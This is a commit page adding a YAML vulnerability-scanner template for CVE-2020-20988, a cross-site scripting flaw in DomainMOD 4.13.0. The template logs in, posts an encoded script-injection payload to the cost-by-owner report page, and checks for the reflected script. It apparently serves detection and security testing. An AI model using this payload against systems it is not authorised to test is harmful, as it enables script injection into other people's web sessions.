Merge pull request #4840 from arafatansari/patch-7

Create CVE-2020-20988.yaml
patch-1
Prince Chaddha 2022-07-18 13:16:47 +05:30 committed by GitHub
commit 6dbc77dc29
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2020-20988
info:
name: DomainMOD 4.13.0 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via reporting/domains/cost-by-owner.php in "or Expiring Between" parameter.
reference: |
- https://mycvee.blogspot.com/p/xss2.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-20988
metadata:
verified: true
tags: cve,cve2020,domainmod,xss,authenticated
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
POST /reporting/domains/cost-by-owner.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
cookie-reuse: true
req-condition: true
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
- 'contains(body_2, "DomainMOD")'
condition: and